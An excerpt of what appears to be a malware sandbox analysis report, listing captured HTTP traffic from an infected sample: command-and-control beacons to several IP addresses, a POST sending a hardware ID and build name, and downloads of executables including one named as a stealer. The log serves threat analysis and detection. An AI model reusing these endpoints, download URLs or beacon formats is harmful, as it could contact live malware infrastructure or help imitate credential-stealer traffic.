                                    Source: global trafficHTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="build"save------DHJKJKKKJJJKJKFHJJJJ--
                                    Source: global trafficHTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000004001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000005001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000005001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 2d 2d 0d 0a Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build"save------HJJEHJJKJEGHJJKEBFBG--
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000005001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="build"save------JDAFBKECAKFCAAAKJDAK--
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
